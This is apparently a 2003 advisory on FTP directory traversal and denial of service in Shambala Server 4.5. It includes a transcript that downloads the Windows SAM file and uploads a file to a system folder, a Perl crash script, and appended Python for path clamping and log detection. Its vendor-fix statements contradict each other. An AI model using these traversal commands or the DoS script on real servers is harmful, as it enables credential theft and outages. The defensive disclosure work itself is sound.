Multiple vulnerabilities found in Shambala Server version 4.5 (FTP Service)
Discovered by Dennis Rand
-----------------------------------------------------------------------------

-----[SUMMARY

Shambala is an easy-to-use communications server featuring the ability to serve and access web sites, ftp sites, and chat rooms. Using Shambala, you can quickly create a web site and host it from any PC. Shambala doesn't require NT and its installation is non-invasive. Shambala features a WYSIWYG DHTML editor for placing text and props on your web pages. The editor includes a navigation feature that allows you to express your web site as a geographical area and allow your users to move easily between areas. This feature also exists in the editor so you can create a space quickly without worrying about maintaining hyperlinks between areas. Shambala is drag-and-drop based, allowing you to perfectly size and position your web page elements. You can use a page you are editing as an interactive whiteboard and chat space. When you move a prop or edit text, people connected to your workspace will receive the change that you make. Their workspace is automatically updated to be a mirror image of yours. If any machine in the group decides to leave, nothing is lost, since each subscriber receives a full copy of the web page document being used as a workspace. This powerful feature can be used for interactive classrooms, games, demonstrations, even internet-based group workshops.

To transfer files, Shambala has an integrated ftp client and ftp server. The ftp server provides high-performance access to shared files. You can also manage the security of the ftp site. The client can browse, download, and upload files to any ftp server. It can even automatically download everything on a remote ftp site.

Shambala pushes the envelope of what you can do with web technology. It supports the existing infrastructure of the web but also provides powerful features that allow you to shape the future and evolution of cyberspace.

A directory traversal vulnerability in the product allows remote attackers to make the server traverse into directories that reside outside the bounding FTP root directory. The server is also vulnerable to a DoS attack.

-----[DETAILS

Vulnerable systems: Windows NT 4.0 and Windows 2000 Server, fully patched
 * Shambala Server version 4.5

Immune systems:
 * None

Shambala will not fix any errors; they do not think there is any problem.

Shambala Server fails to filter out "\.." and "/.." sequences in specific command requests, allowing a remote user to break out of the restricted directory and gain read access to the system directory structure. It is possible to discover the directory structure outside the configured areas, and to get files from outside the configured areas. What could be even worse is that you can send files to places outside the configured areas, so a Trojan could be placed.

The following transcript demonstrates a sample exploitation of the vulnerabilities:

C:\>ftp
ftp> open
To 192.168.1.199
Connected to 192.168.1.199.
220 winnt40 - Shambala FTP Server Ready.
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> cd /
257 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,00Seconds 78000,00Kbytes/sec.
ftp> cd \..\
550 Requested action not taken. Permission denied.
ftp> ls
200 PORT command successful.
150 Opening data connection.
192.168.1.199
index-_-1_0_0.htm
index-_0_0_0.htm
index-_0_1_0.htm
pwd.pl
226 Transfer complete.
ftp: 78 bytes received in 0,01Seconds 7,80Kbytes/sec.
ftp> ls \..\..\..\..\..\..\..\..\..\..\
200 PORT command successful.
150 Opening data connection.
AUTOEXEC.BAT
CONFIG.SYS
I386
Inetpub
Installationsfiler til Windows Update
Multimedia Files
OptionPack
pagefile.sys
Program Files
pwd.pl
Shambala Server 4.5
TEMP
WINNT
226 Transfer complete.
ftp: 181 bytes received in 0,03Seconds 6,03Kbytes/sec.
ftp> ls \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\
200 PORT command successful.
150 Opening data connection.
autoexec.nt
config.nt
default._
ntuser.da_
sam._
security._
setup.log
software._
system._
226 Transfer complete.
ftp: 99 bytes received in 0,06Seconds 1,65Kbytes/sec.
ftp> get \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\sam._
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
ftp: 3196 bytes received in 0,00Seconds 3196000,00Kbytes/sec.
ftp> send pwd.pl \..\..\..\..\..\..\..\..\..\..\WINNT\REPAIR\test.pl
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
ftp: 3849 bytes sent in 0,00Seconds 3849000,00Kbytes/sec.
ftp> bye
221 Goodbye.

-----[EXPLOIT CODE

The second attack type is a DoS attack that will kill the server application.

------------------------------------- Cut Here ------------------------------------------
#!/usr/bin/perl
#
# Shambala Server version 4.5
# http://www.evolvable.com
#
# When this exploit is sent, the server crashes with an error
# message on the server:
#
#  __________________________
# | Run-time error '20127':  |
# | Invalid ConnectionID     |
#  --------------------------
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
use strict;
use warnings;
use Net::FTP;

my $target = shift() || die "usage: $0 <target ip>\n";
my $user   = "anonymous";
my $pass   = "mail\@mail.com";

system('cls');    # clear the console (Windows)
print "Shambala Server version 4.5 DoS attack\n";
print "Trying to connect and destroy target system at: $target...\n";

# Connect, log in anonymously and change to "/"; the CWD "/" request is
# what triggers the run-time error on the server. Net::FTP->new reports
# connection failures in $@, not $!.
my $ftp = Net::FTP->new($target, Debug => 1, Port => 21)
    || die "could not connect: $@";
$ftp->login($user, $pass) || die "could not login: " . $ftp->message;
$ftp->cwd("/");
$ftp->quit;
------------------------------------- Cut Here ------------------------------------------

-----[DETECTION

Shambala Server version 4.5 is vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, experiment by following the above transcript.

-----[VENDOR RESPONSE

Shambala Server version 4.xx fixes this issue. The latest version is available from http://www.evolvable.com

-----[DISCLOSURE TIMELINE

18/11/2002  Found the vulnerability.
19/11/2002  Author notified. Mail sent to webmaster@evolvable.com and help@evolvable.com.
18/01/2003  Response received from Evolvable.
18/01/2003  Public disclosure.

-----[ADDITIONAL INFORMATION

The vulnerability was discovered by Dennis Rand.

-----[DISCLAIMER

The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever, including direct, indirect, incidental, consequential, loss of business profits or special damages.
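As an added example (not code from the advisory, from Shambala or from Evolvable), the following Python shows the two things a defender takes from the DETAILS and DETECTION sections above: how an FTP server should resolve a client-supplied path so that neither "/.." nor "\.." can leave the configured root, and how the same resolver can flag traversal attempts in server logs instead of replaying the transcript by hand. The log line layout, the client address, the timestamps and the root directory /srv/ftp are constructed for the example; Shambala's real log format is not documented in the advisory.

```python
import os
import re
from typing import List, Optional, Tuple

# Treat "/" and "\" alike when splitting a path argument. Forgetting the
# backslash on a Windows host is exactly the gap the advisory describes.
_SEPARATORS = re.compile(r"[\\/]+")

# FTP commands that take a path argument and therefore need the check.
PATH_COMMANDS = {"CWD", "LIST", "NLST", "RETR", "STOR", "APPE", "DELE",
                 "MKD", "RMD", "RNFR", "RNTO", "SIZE", "MDTM"}


def resolve_virtual_path(cwd: str, arg: str) -> Tuple[str, bool]:
    """Resolve a client-supplied path against the session's virtual working
    directory. Returns (virtual_path, escaped).

    The virtual path is POSIX style and rooted at "/". A ".." can never climb
    above "/": it is clamped there instead, so "\\..\\..\\WINNT\\REPAIR\\sam._"
    becomes "/WINNT/REPAIR/sam._" inside the FTP root. `escaped` is True when a
    ".." tried to climb above the root, which is the signal worth logging.
    """
    # A leading "/" or "\" makes the argument absolute, relative to the FTP root.
    parts: List[str] = [] if arg[:1] in ("/", "\\") else [p for p in cwd.split("/") if p]
    escaped = False
    for piece in _SEPARATORS.split(arg):
        if piece in ("", "."):
            continue
        if piece == "..":
            if parts:
                parts.pop()
            else:
                escaped = True  # attempt to climb above the root; stay at "/"
            continue
        parts.append(piece)
    return "/" + "/".join(parts), escaped


def to_filesystem_path(root_dir: str, virtual: str) -> Optional[str]:
    """Map a resolved virtual path onto the real FTP root directory.

    Defence in depth: even after clamping, the final real path is checked to
    lie under the real root, which catches symlinks pointing outside it and
    drive-letter components such as "D:" on Windows. Returns None if it escapes.
    """
    root_real = os.path.realpath(root_dir)
    candidate = os.path.realpath(
        os.path.join(root_real, *[p for p in virtual.split("/") if p]))
    try:
        inside = os.path.commonpath([root_real, candidate]) == root_real
    except ValueError:  # paths on different drives (Windows)
        inside = False
    return candidate if inside else None


# One log line per request: "<date> <time> <client> <user> <CMD> [<argument>]".
# This layout is an assumption made for the example.
_LOG_LINE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<client>\S+) (?P<user>\S+) (?P<cmd>[A-Z]{3,4})(?: (?P<arg>.*))?$")

# Constructed sample log, modelled on the commands in the advisory's transcript.
SAMPLE_LOG = [
    "2002-11-18 10:02:11 192.168.1.50 anonymous USER anonymous",
    "2002-11-18 10:02:14 192.168.1.50 anonymous CWD ..",
    "2002-11-18 10:02:15 192.168.1.50 anonymous CWD /",
    "2002-11-18 10:02:20 192.168.1.50 anonymous CWD \\..\\",
    "2002-11-18 10:02:31 192.168.1.50 anonymous LIST \\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\",
    "2002-11-18 10:02:45 192.168.1.50 anonymous RETR \\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\WINNT\\REPAIR\\sam._",
    "2002-11-18 10:02:59 192.168.1.50 anonymous STOR \\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\WINNT\\REPAIR\\test.pl",
    "2002-11-18 10:03:05 192.168.1.50 anonymous RETR index-_0_0_0.htm",
]


def audit_ftp_log(lines: List[str], cwd: str = "/") -> List[Tuple[str, str, str, str]]:
    """Return (timestamp, client, command, argument) for each request whose
    path argument tried to climb above the FTP root. The audit is stateless:
    every request is resolved against `cwd` (default "/"), which is enough to
    spot the pattern without replaying the whole session."""
    hits: List[Tuple[str, str, str, str]] = []
    for line in lines:
        m = _LOG_LINE.match(line)
        if not m or m.group("cmd") not in PATH_COMMANDS or m.group("arg") is None:
            continue
        _, escaped = resolve_virtual_path(cwd, m.group("arg"))
        if escaped:
            hits.append((m.group("ts"), m.group("client"), m.group("cmd"), m.group("arg")))
    return hits


if __name__ == "__main__":
    # Replay the traversal argument from the advisory's transcript.
    virtual, escaped = resolve_virtual_path("/", "\\..\\..\\..\\..\\WINNT\\REPAIR\\sam._")
    print(f"resolved to {virtual!r}, escape attempted: {escaped}")
    print("mapped to:", to_filesystem_path("/srv/ftp", virtual))  # /srv/ftp: placeholder root
    for ts, client, cmd, arg in audit_ftp_log(SAMPLE_LOG):
        print(f"{ts} {client} traversal attempt in {cmd} {arg}")
```

The resolver never rejects a request outright; it clamps at the root the way a chroot would, so a request for `\..\..\WINNT\REPAIR\sam._` simply looks for `WINNT/REPAIR/sam._` inside the FTP root and gets the normal 550 when that does not exist. The `escaped` flag is what feeds alerting: on the sample log it picks out the `CWD`, `LIST`, `RETR` and `STOR` requests that carried `..` sequences and leaves the ordinary `CWD /` and `RETR index-_0_0_0.htm` alone.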